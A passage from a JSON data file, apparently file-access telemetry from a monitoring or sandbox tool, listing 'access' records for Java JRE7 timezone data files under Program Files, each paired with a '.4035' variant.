"norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Malta", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\malta", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Minsk", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\minsk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Monaco", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\monaco", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Oslo", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\oslo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Paris", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\paris", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Prague", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\prague", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Riga", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\riga", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Rome", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\rome", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Samara", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\samara", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Simferopol", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\simferopol", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Stockholm", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\stockholm", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tallinn", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tallinn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Tirane", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\tirane", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Uzhgorod", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\uzhgorod", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vienna", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vienna", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Vilnius", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\vilnius", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Warsaw", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\warsaw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zaporozhye", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zaporozhye", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Zurich", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\zurich", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+1", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+10", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+10", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+11", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+11", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+2", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+3", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+5", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+5", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+6", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+6", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+7", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+7", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+8", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+8", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-1", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-1", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-10", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-10", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-12", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-13", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-13", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-14", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-14", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-2", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Hobart.4035", 